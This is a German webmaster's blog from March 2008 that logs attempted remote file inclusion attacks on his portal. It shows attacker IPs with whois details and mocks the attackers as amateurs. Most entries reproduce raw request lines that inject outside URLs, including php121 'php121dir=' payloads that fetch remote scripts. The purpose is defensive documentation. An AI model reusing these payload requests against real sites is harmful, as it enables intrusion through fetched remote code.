Montag, 31. März 2008

Wie geht es weiter?

Hallo liebe Leser,

es folgt in Kürze eine sehr interessante eBook-Serie, auf die kein Webmaster verzichten sollte.

Die Serie beinhaltet z. B. Beispiele, wie Sie selber auf einfachen Wege eine Protokollierung auf Ihre Website bringen können, gefolgt von weiteren Beispielen, wie z. B. eine fertige .htaccess, die dann bestimmte Netzwerke sperrt, auf die man eh verzichten kann.

Natürlich als Add-On, werden in diesem eBook die Dümmsten unter den Hackern detailliert mit Datum, Uhrzeit und IP geoutet. :-)

Mit den detaillierten Protokollauszügen wird Ihnen gezeigt, wie Sie diese Hacking-Angriffe erkennen und viele davon auch abwehren können.

Wie sieht es mit Ihrem Portal aus, egal ob Forum, Shop oder Homepage? Wie sicher ist Ihr Portal?

Diese und viele weitere Fragen werden in der eBook-Serie beantwortet.


Verpassen Sie nicht den Starttermin der ersten Ausgabe am 05.04.08.

Einfach ein absolutes MUSS für jeden Webmaster!





Viele Grüsse

Der Webmaster

P.S... ein Gruss an die Amateure, die Angriffe, die nun auf den Shop folgen, erscheinen dann in der zweiten eBook-Ausgabe 02/2008. :-)

Eingestellt von Werner Modes um 12:44 0 Kommentare
Labels: , , , , ,

Samstag, 29. März 2008

Angriff am 18.03.08

Am 18.03.08 ging es dann weiter, die Amateure versuchten weiterhin erfolglos, mein Portal zu hacken.


Auch diesmal versuchten es einer über eine bekannte Sicherheitslücke eines PHP-Scripts (php121), naja, man hat ja mal was von gehört. Meine Meinung ist, diese Amateure starten irgendein Tool aber haben gar keine Ahnung, was sie da eigentlich tun, denn den Button eines Hackertools kann ja jeder Idiot drücken.

Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!

Der erste Versuch am 18.03.08

Der Amateur, der hier mittels seiner IP 222.255.3.68 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 222.255.0.0 - 222.255.3.255
netname: VDC-NET
country: vn
descr: VietNam Data Communication Company

Hier das Protokoll:

18.03.08, 16:58:05, 222.255.3.68, /index.php?page=services/osData/php121/php121db.php?
php121dir=http://www.cdpm3.com/id.txt?

Der zweite Versuch am 18.03.08

Der Amateur, der hier mittels seiner IP 88.191.26.64 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 88.191.3.0 - 88.191.248.255
netname: FR-DEDIBOX
descr: Dedibox SAS
descr: Customers
descr: Paris, France

Hier das Protokoll, der hat sich ja richtig Mühe gegeben aber das tut ein blindes Huhn ja auch:

18.03.08, 21:34:20, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.agv-schaafheim.de%2F
gallery%2Fdata%2Fmedia%2Fnexa%2Fzevela%2F
18.03.08, 21:34:22, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b
%2Fpages%2Fgodot%2Feridehi%2F
18.03.08, 21:34:23, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.polisgrandhotel.gr%2F
_cm_admin%2Fmaillist%2Feditor%2Fplugins%2Fcore%2Fdialogs%2Fqunik%2Futanac%2F
18.03.08, 21:34:35, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
fabcraft.co.uk%2Fforum%2Fugak%2Fmiketat%2F
18.03.08, 21:34:36, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
tcmforum.com%2Fweb%2Fsal%2Fyuveli%2F
18.03.08, 21:34:37, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
clubnataciotortosa.com%2FUserFiles%2FFile%2Fedut%2Fjezin%2F
18.03.08, 21:34:39, 88.191.26.64, /index.php?page=articles
18.03.08, 21:34:39, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fsites.
redskycreative.com%2Fcanyonlakechurch%2Fjolalu%2Fbuq%2F
18.03.08, 21:34:40, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.
soeasywebsite.com%2Fsoeasycasino%2Fenosucu%2Fijani%2F
18.03.08, 21:34:41, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.
landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fotitob%2F
18.03.08, 21:34:42, 88.191.26.64, /index.php?page=privacy
18.03.08, 21:34:44, 88.191.26.64, /?orderby=http%3A%2F%2Fwww.centralbalkannationalpark.org
%2Fde%2Fjage%2Fcevoyi%2F&sortorder=asc
18.03.08, 21:34:44, 88.191.26.64, /?orderby=http%3A%2F%2Fwww.centralbalkannationalpark.org
%2Fde%2Fjage%2Fcevoyi%2F&sortorder=asc
18.03.08, 21:34:45, 88.191.26.64, /?orderby=http%3A%2F%2Fctot.ru%2Fsts%2Fst22.files%2Fcusipu
%2Fhidola%2Fapa%2F&sortorder=asc
18.03.08, 21:34:45, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fwww.planet-
pictures.de%2Fcontent_system%2Fola%2Fitil%2F
18.03.08, 21:34:46, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fhonamfishing.co.kr
%2Fphpmysqladmin%2Flibraries%2Fnov%2Fwulosu%2F
18.03.08, 21:34:46, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fwww.marsbook.co.kr
%2Fmain%2Fcreated%2Fproduct%2F2%2Fmumas%2Fohalupa%2F
18.03.08, 21:34:47, 88.191.26.64, /index.php?page=terms_of_use
18.03.08, 21:34:48, 88.191.26.64, /index.php?page=showarticle&articleid=1
18.03.08, 21:34:48, 88.191.26.64, /?orderby=gender&sortorder=asc
18.03.08, 21:34:49, 88.191.26.64, /?orderby=sincedate&sortorder=asc

Der dritte Versuch am 18.03.08

Der Amateur, der hier mittels seiner IP 209.62.86.4 seine Spur hinterlies, kam über folgenden Provider:

OrgName: ThePlanet.com Internet Services, Inc.
OrgID: TPCM
Address: 315 Capitol
Address: Suite 205
City: Houston
NetRange: 209.62.0.0 - 209.62.127.255

Hier das Protokoll, frei nach dem Motto "und mühsam ernährt sich das Eichörnchen":

18.03.08, 22:27:03, 209.62.86.4, /index.php?page=http%3A%2F%2F
www.sanyoclim.fr%2Fextension%2Fezodf%2Fedidu%2Feyep%2F
18.03.08, 22:27:05, 209.62.86.4, /index.php?page=http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2F
pic%2Fhuv%2Fabey%2F
18.03.08, 22:27:06, 209.62.86.4, /index.php?page=http%3A%2F%2Fwww.zetesis.biz%2FLMR%2Fade
%2Fzupe%2F
18.03.08, 22:27:08, 209.62.86.4, /index.php?page=shownews&newsid=
http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fenosucu
%2Fijani%2F
18.03.08, 22:27:10, 209.62.86.4, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.blankner
.ocps.net%2Fmedia%2Fimages%2Fefepi%2Fasopuy%2F
18.03.08, 22:27:11, 209.62.86.4, /index.php?page=shownews&newsid=http%3A%2F%2Fchyngachanga
.ru%2Fcontent%2Fwuge%2Fasagula%2F
18.03.08, 22:27:16, 209.62.86.4, /index.php?page=login
18.03.08, 22:27:18, 209.62.86.4, /index.php?page=shownews&newsid=6
18.03.08, 22:27:23, 209.62.86.4, /?orderby=http%3A%2F%2Fwww.boomerbible.com%2Finstapunk%2F
MType%2Farchives%2Fajuq%2Fpiy%2F&sortorder=asc
18.03.08, 22:27:25, 209.62.86.4, /?orderby=http%3A%2F%2Fsites.redskycreative.com%2Fcanyonlakechurch
%2Fjolalu%2Fbuq%2F&sortorder=asc
18.03.08, 22:27:26, 209.62.86.4, /?orderby=http%3A%2F%2Fwww.snowmobile.ro%2Fphoto%2Fproduct%2F
_ugohoj%2Ferisa%2Fodiy%2Fwifefef%2F&sortorder=asc
18.03.08, 22:27:28, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.municipioxii.it%2F
sunnyway%2Figodoq%2Fbukosud%2F
18.03.08, 22:27:30, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.antwerpsupporter
.be%2Fsubscribe_2_me_to-delete%2Fsm%2Fexported_files1%2
Fmosupoz%2Fadusa%2Fojafujo%2Faweji%2F
18.03.08, 22:27:31, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.lamarguerite.ca%2F
Pat%2Fimages%2Fawixeta%2Fveb%2F
18.03.08, 22:27:33, 209.62.86.4, /index.php?page=terms_of_use
18.03.08, 22:27:42, 209.62.86.4, /?orderby=city&sortorder=asc
18.03.08, 22:27:44, 209.62.86.4, /?orderby=country&sortorder=asc

Auch für diesen Tag gilt, planloses Starten von irgendwelchen Tools, wo diese Dilettanten gar nicht so recht wissen, was sie da eigentlich tun. Schon der Versuch ist strafbar!

Viele Grüsse

Der Webmaster

Eingestellt von Werner Modes um 16:45 0 Kommentare
Labels: , , , , , , , ,

Angriff am 17.03.08

Am 17.03.08 kamen dann die nächsten Idioten (Hacker) mit ihren amateurhaften Angriffsversuchen.


Diesmal versuchten Sie es über eine bekannte Sicherheitslücke eines PHP-Scripts (php121), naja, man hat ja mal was von gehört. Meine Meinung ist, diese Amateure starten irgendein Tool aber haben gar keine Ahnung, was sie da eigentlich tun, denn den Button eines Hackertools kann ja jeder Idiot drücken.

Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!

Der erste Versuch am 17.03.08

Der Amateur, der hier mittels seiner IP 165.138.51.197 seine Spur hinterlies, kam über folgenden Provider:

OrgName: Indiana Department of Education
OrgID: IDE-10
Address: Room 229
Address: State House
City: Indianapolis
NetRange: 165.138.0.0 - 165.138.255.255

Hier das Protokoll:

17.03.08, 15:49:32, 165.138.51.197, /index.php?page=services//osData/php121/php121db.php?
php121dir=http://nkdb.org//AsaMall/makeup/id.txt??
17.03.08, 15:49:34, 165.138.51.197, /index.php?page=services//osData/php121/php121db.php?
php121dir=http://revelation-divine.net/backup/id.txt??

Der zweite Versuch am 17.03.08

Der Amateur, der hier mittels seiner IP 202.181.99.83 seine Spur hinterlies, kam über folgenden Provider:

inetnum:      202.181.96.0 - 202.181.111.255
netname:      SAKURA
descr:        SAKURA Internet Inc.
descr:        1-8-14, Minami Honmachi, Chuo-ku, Osaka 541-0054, Japan
country:      JP

Hier das Protokoll:

17.03.08, 16:34:43, 202.181.99.83,
/index.php?page=services//osData/php121/php121db.php?
php121dir=http://contactcraze.com/cmd-asc.txt??

Der dritte Versuch am 17.03.08

Der Amateur, der hier mittels seiner IP 86.197.68.38 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 86.197.68.0 - 86.197.68.255
address: FRANCE TELECOM/SCR
netname: IP2000-ADSL-BAS
descr: BSNIC152 Nice Bloc 1
country: FR

Hier das Protokoll:

17.03.08, 19:08:44, 86.197.68.38, /index.php?page=services//osData/php121/php121db.php?
php121dir=http://www.germ2.com/www/z.txt???

Auch hier hat dieser Amateure keinen Schaden angerichtet, jedoch, schon der Versuch ist strafbar! Über so viel Dummheit, kann man echt nur grinsen. :-)

Viele Grüsse

Der Webmaster

Eingestellt von Werner Modes um 15:58 0 Kommentare
Labels: , , , , , , , ,

Angriff am 04.03.08

Am 04.03.08 kam dann er nächsten Hacker mit einem amateurhaften Angriffsversuch.

Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!

Der Versuch am 04.03.08

Der Amateur, der hier mittels seiner IP 67.15.191.24 seine Spur hinterlies, kam über folgenden Provider:

OrgName:    ThePlanet.com Internet Services, Inc. 
OrgID:      TPCM
Address:    315 Capitol
Address:    Suite 205
City:       Houston
StateProv:  TX
NetRange:   67.15.0.0 - 67.15.255.255
Hier das Protokoll:

04-03-08 / 10:47:05 - 67.15.191.24 - /
04-03-08 / 10:47:07 - 67.15.191.24 - /index.php?page=http%3A%2F%2Fwww.northfans.ch%2Fforum%2F
admin%2Fsettings%2Fgucor%2Fujusu%2F
04-03-08 / 10:47:08 - 67.15.191.24 - /index.php?page=http%3A%2F%2Fwww.felixtorresycia.com%2F
admin%2Fcorreo%2Fenaq%2Fecib%2F
04-03-08 / 10:47:09 - 67.15.191.24 - /index.php?page=http%3A%2F%2Fwww.thoseguysfilms.com%2F
forums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F
04-03-08 / 10:47:13 - 67.15.191.24 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F
04-03-08 / 10:47:14 - 67.15.191.24 - /index.php?page=shownews&newsid=http%3A%2F%2Fsahel55.com%2F
articles%2Fomaduro%2Fkimumid%2F
04-03-08 / 10:47:15 - 67.15.191.24 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.electrofed
.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F
04-03-08 / 10:47:18 - 67.15.191.24 - /index.php?page=allnews
04-03-08 / 10:47:21 - 67.15.191.24 - /index.php?page=faq
04-03-08 / 10:47:22 - 67.15.191.24 - /index.php?page=login
04-03-08 / 10:47:24 - 67.15.191.24 - /?orderby=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin
%2Fsettings%2Fgucor%2Fujusu%2F&sortorder=asc
04-03-08 / 10:47:25 - 67.15.191.24 - /?orderby=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap
%2Fehudute%2F&sortorder=asc
04-03-08 / 10:47:26 - 67.15.191.24 - /?orderby=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap
%2Fehudute%2F&sortorder=asc
04-03-08 / 10:47:27 - 67.15.191.24 - /?orderby=city&sortorder=http%3A%2F%2Fsahel55.com%2Farticles
%2Fomaduro%2Fkimumid%2F
04-03-08 / 10:47:28 - 67.15.191.24 - /?orderby=city&sortorder=http%3A%2F%2Fwww.obrasmecanicasch
.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F
04-03-08 / 10:47:29 - 67.15.191.24 - /?orderby=city&sortorder=http%3A%2F%2Fwww.elettrodataservice.it
%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F
04-03-08 / 10:47:31 - 67.15.191.24 - /index.php?page=services
04-03-08 / 10:47:32 - 67.15.191.24 - /index.php?page=privacy
04-03-08 / 10:47:36 - 67.15.191.24 - /?orderby=city&sortorder=asc
04-03-08 / 10:47:37 - 67.15.191.24 - /?orderby=gender&sortorder=asc

Auch hier hat dieser Amateure keinen Schaden angerichtet, jedoch, schon der Versuch ist strafbar!

Viele Grüsse

Der Webmaster

Eingestellt von Werner Modes um 15:32 0 Kommentare
Labels: , , , , , , , ,

Angriff am 03.03.08

Am 03.03.08 ging es dann munter weiter, mit den amateurhaften Angriffsversuchen.

Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!

Der erste Versuch am 03.03.08

Der Amateur, der hier mittels seiner IP 213.232.89.31 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 213.232.89.0 - 213.232.89.255
netname: GNX-NETWORK
descr: GNX Network Ltd. Second Allocation
country: GB
address: London

Hier das Protokoll:

03-03-08 / 16:09:54 - 213.232.89.31 - /
03-03-08 / 16:09:55 - 213.232.89.31 - /index.php?page=http%3A%2F%2Fwww.felixtorresycia.com%2F
admin%2Fcorreo%2Fenaq%2Fecib%2F
03-03-08 / 16:09:57 - 213.232.89.31 - /index.php?page=http%3A%2F%2Fwww.thoseguysfilms.com%2F
forums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F
03-03-08 / 16:09:58 - 213.232.89.31 - /index.php?page=http%3A%2F%2Fwww.northfans.ch%2Fforum%2F
admin%2Fsettings%
2Fgucor%2Fujusu%2F
03-03-08 / 16:10:03 - 213.232.89.31 - /index.php?page=shownews&newsid=http%3A%2F%2Fsans-packing.
ru%2Fimg%2Fjipeqap%2Fehudute%2F
03-03-08 / 16:10:04 - 213.232.89.31 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.felixtorr
esycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F
03-03-08 / 16:10:05 - 213.232.89.31 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.municipi
oxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F
03-03-08 / 16:10:09 - 213.232.89.31 - /index.php?page=allnews
03-03-08 / 16:10:11 - 213.232.89.31 - /index.php?page=privacy
03-03-08 / 16:10:13 - 213.232.89.31 - /index.php
03-03-08 / 16:10:14 - 213.232.89.31 - /index.php?page=articles
03-03-08 / 16:10:16 - 213.232.89.31 - /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.altaiseer
-eg.com%2Far%2Farticles%2Fjed%2Fumut%2F
03-03-08 / 16:10:20 - 213.232.89.31 - /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.northfans
.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F
03-03-08 / 16:10:22 - 213.232.89.31 - /index.php?page=showarticle&articleid=http%3A%2F%2Fsahel55.com%2F
articles%2Fomaduro%2Fkimumid%2F
03-03-08 / 16:10:29 - 213.232.89.31 - /index.php?page=shownews&newsid=3
03-03-08 / 16:10:30 - 213.232.89.31 - /index.php?page=faq
03-03-08 / 16:10:31 - 213.232.89.31 - /index.php?page=showarticle&articleid=1

Am gleichen Tag folgte dann ein zweiter Angriff.

Der Amateur, der hier mittels seiner IP 81.25.195.225 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 81.25.195.224 - 81.25.195.239
netname: ITEMA-NET
descr: ITEMA
descr: Paris
country: FR

Hier das Protokoll:

03-03-08 / 17:13:31 - 81.25.195.225 - /
03-03-08 / 17:13:33 - 81.25.195.225 - /index.php?page=http%3A%2F%2Fwww.channelnewsperu.com%2F
imagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F
03-03-08 / 17:13:35 - 81.25.195.225 - /index.php?page=http%3A%2F%2Fwww.altaiseer-eg.com%2Far%2F
articles%2Fjed%2Fumut%2F
03-03-08 / 17:13:39 - 81.25.195.225 - /index.php?page=http%3A%2F%2Fwww.felixtorresycia.com%2F
admin%2Fcorreo%2Fenaq%2Fecib%2F
03-03-08 / 17:13:49 - 81.25.195.225 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.cjp.spb
.ru%2Fen%2Ftis%2Fleboma%2F
03-03-08 / 17:13:50 - 81.25.195.225 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.electro
fed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F
03-03-08 / 17:13:51 - 81.25.195.225 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.felixtor
resycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F
03-03-08 / 17:13:53 - 81.25.195.225 - /?orderby=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin
%2Flibraries%2Foduzov%2Fneloze%2F&sortorder=asc
03-03-08 / 17:13:54 - 81.25.195.225 - /?orderby=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes
%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F&sortorder=asc
03-03-08 / 17:13:55 - 81.25.195.225 - /?orderby=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin
%2Flibraries%2Foduzov%2Fneloze%2F&sortorder=asc
03-03-08 / 17:13:56 - 81.25.195.225 - /?orderby=age&sortorder=http%3A%2F%2Fwww.municipioxii.it%2F
sunnyway%2Feheqebi%2Fjahibop%2F
03-03-08 / 17:13:57 - 81.25.195.225 - /?orderby=age&sortorder=http%3A%2F%2Fwww.obrasmecanicasch
.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F
03-03-08 / 17:13:58 - 81.25.195.225 - /?orderby=age&sortorder=http%3A%2F%2Fwww.electrofed.com%2F
_app%2Fefc%2Fodoqu%2Fferus%2F
03-03-08 / 17:13:58 - 81.25.195.225 - /index.php?page=privacy
03-03-08 / 17:13:59 - 81.25.195.225 - /index.php?page=faq
03-03-08 / 17:14:02 - 81.25.195.225 - /index.php
03-03-08 / 17:14:03 - 81.25.195.225 - /index.php?page=allnews
03-03-08 / 17:14:04 - 81.25.195.225 - /index.php?page=terms_of_use
03-03-08 / 17:14:06 - 81.25.195.225 - /?orderby=age&sortorder=asc

Alle Guten Dinge sind drei, hier der dritte Idiot.

Der Amateur, der hier mittels seiner IP 83.246.95.76 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 83.246.94.0 - 83.246.95.255
netname: SERVERPOOL-VPS1-NET
descr: VPS Serverpool
descr: Hannover, Germany
country: DE

Hier das Protokoll:

03-03-08 / 20:44:21 - 83.246.95.76 - /
03-03-08 / 20:44:24 - 83.246.95.76 - /index.php?page=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2F
pages%2Filosi%2Fdohigal%2F
03-03-08 / 20:44:25 - 83.246.95.76 - /index.php?page=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch
%2Fimg%2Fitofu%2Fviroja%2F
03-03-08 / 20:44:25 - 83.246.95.76 - /index.php?page=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2F
correo%2Fenaq%2Fecib%2F
03-03-08 / 20:44:29 - 83.246.95.76 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.elettrodata
service.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F
03-03-08 / 20:44:30 - 83.246.95.76 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.obrasmecani
casch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F
03-03-08 / 20:44:31 - 83.246.95.76 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.elettrodata
service.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F
03-03-08 / 20:44:32 - 83.246.95.76 - /index.php?page=faq
03-03-08 / 20:44:33 - 83.246.95.76 - /index.php?page=allnews
03-03-08 / 20:44:34 - 83.246.95.76 - /index.php?page=services
03-03-08 / 20:44:36 - 83.246.95.76 - /index.php?page=articles
03-03-08 / 20:44:37 - 83.246.95.76 - /index.php?page=showarticle&articleid=http%3A%2F%2Fsahel55.com
%2Farticles%2Fomaduro%2Fkimumid%2F
03-03-08 / 20:44:38 - 83.246.95.76 - /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.psikoloji
kyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F
03-03-08 / 20:44:38 - 83.246.95.76 - /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.altaiseer
-eg.com%2Far%2Farticles%2Fjed%2Fumut%2F
03-03-08 / 20:44:42 - 83.246.95.76 - /index.php?page=showarticle&articleid=1

Auch hier hat keiner der Amateure Schaden angerichtet, jedoch, schon der Versuch ist strafbar!

Viele Grüsse

Der Webmaster

Eingestellt von Werner Modes um 15:16 0 Kommentare
Labels: , , , , , , , ,

Der erste Angriff am 02.03.08

Der erste Versuch, am 02.03.08 fingen die Hacking-Angriffe auf eines meiner Portale an.

Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!

Der Amateur, der hier mittels seiner IP 209.23.126.65 seine Spur hinterlies, kam über folgenden Provider:

OrgName: Logical Net Corporation
OrgID: LNC
Address: 1593 Central Ave.
City: Albany
StateProv: NY
PostalCode: 12205
Country: US
NetRange: 209.23.0.0 - 209.23.127.255

Hier das Protokoll:

02-03-08 / 20:23:33 - 209.23.126.65 - /index.php?page=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2
F&newsid=3
02-03-08 / 20:23:36 - 209.23.126.65 - /index.php?page=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2
FsubSilver%2Fimages%2Fuza%2Flaqipu%2F&newsid=3
02-03-08 / 20:23:37 - 209.23.126.65 - /index.php?page=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2F
ferus%2F&newsid=3
02-03-08 / 20:23:38 - 209.23.126.65 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%
2Fpages%2Filosi%2Fdohigal%2F
02-03-08 / 20:23:40 - 209.23.126.65 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforu
ms%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F
02-03-08 / 20:23:41 - 209.23.126.65 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2F
leboma%2F
02-03-08 / 20:23:56 - 209.23.126.65 - /index.php?page=shownews&newsid=3
02-03-08 / 20:23:57 - 209.23.126.65 - /index.php
02-03-08 / 20:24:00 - 209.23.126.65 - /?orderby=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%
2F&sortorder=asc
02-03-08 / 20:24:01 - 209.23.126.65 - /?orderby=http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2Fpic%2Fbezefi%2Fugoye%2
F&sortorder=asc
02-03-08 / 20:24:02 - 209.23.126.65 - /?orderby=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap%2Fehudute%2F&sortor
der=asc
02-03-08 / 20:24:02 - 209.23.126.65 - /?orderby=country&sortorder=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_artic
oli%2Fonoda%2Fiyegimi%2F
02-03-08 / 20:24:04 - 209.23.126.65 - /?orderby=country&sortorder=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Flebom
a%2F

Am gleichen Tag folgte dann ein zweiter Angriff.

Der Amateur, der hier mittels seiner IP 72.232.44.170 seine Spur hinterlies, kam über folgenden Provider:

OrgName: Layered Technologies, Inc.
OrgID: LAYER-3
Address: 5085 W Park Blvd
Address: Suite 700
City: Plano
StateProv: TX
PostalCode: 75093
Country: US
NetRange: 72.232.0.0 - 72.233.127.255

02-03-08 / 21:11:30 - 72.232.44.170 - /
02-03-08 / 21:11:33 - 72.232.44.170 - /index.php?page=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicac
iones%2Ffotos%2Fnepicu%2Fegul%2F
02-03-08 / 21:11:34 - 72.232.44.170 - /index.php?page=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicac
iones%2Ffotos%2Fnepicu%2Fegul%2F
02-03-08 / 21:11:36 - 72.232.44.170 - /index.php?page=http%3A%2F%2Fwww.interkonet.com%2Fenxicmarxant%2Fweb%2Fe
ditor%2Fscripts%2Ficons%2Fcatizi%2Farofo%2F
02-03-08 / 21:11:47 - 72.232.44.170 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.felixtorresycia.com%2Fadm
in%2Fcorreo%2Fenaq%2Fecib%2F
02-03-08 / 21:11:51 - 72.232.44.170 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.heaven-house.kz%2Ftempl
ates_c%2Fsexes%2Fafacub%2F
02-03-08 / 21:11:52 - 72.232.44.170 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.interkonet.com%2Fenxicma
rxant%2Fweb%2Feditor%2Fscripts%2Ficons%2Fcatizi%2Farofo%2F
02-03-08 / 21:11:57 - 72.232.44.170 - /index.php?page=articles
02-03-08 / 21:12:02 - 72.232.44.170 - /index.php?page=showarticle&articleid=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmy
sqladmin%2Flibraries%2Foduzov%2Fneloze%2F
02-03-08 / 21:12:04 - 72.232.44.170 - /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.elettrodataservice.it%2F
foto_articoli%2Fonoda%2Fiyegimi%2F
02-03-08 / 21:12:06 - 72.232.44.170 - /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.psikolojikyardim.org%2F
etkinlik%2Finclude%2Feto%2Fnixaz%2F
02-03-08 / 21:12:08 - 72.232.44.170 - /index.php?page=faq
02-03-08 / 21:12:10 - 72.232.44.170 - /index.php
02-03-08 / 21:12:16 - 72.232.44.170 - /?orderby=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2F
viroja%2F&sortorder=asc
02-03-08 / 21:12:17 - 72.232.44.170 - /?orderby=http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2Fpic%2Fbezefi%2Fugoye%2
F&sortorder=asc
02-03-08 / 21:12:19 - 72.232.44.170 - /?orderby=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fjoomla%2Fmambots%2Fconten
t%2Fugi%2Fvipo%2F&sortorder=asc
02-03-08 / 21:12:20 - 72.232.44.170 - /?orderby=sincedate&sortorder=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc
%2Fodoqu%2Fferus%2F
02-03-08 / 21:12:21 - 72.232.44.170 - /?orderby=sincedate&sortorder=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%
2Fcorreo%2Fenaq%2Fecib%2F
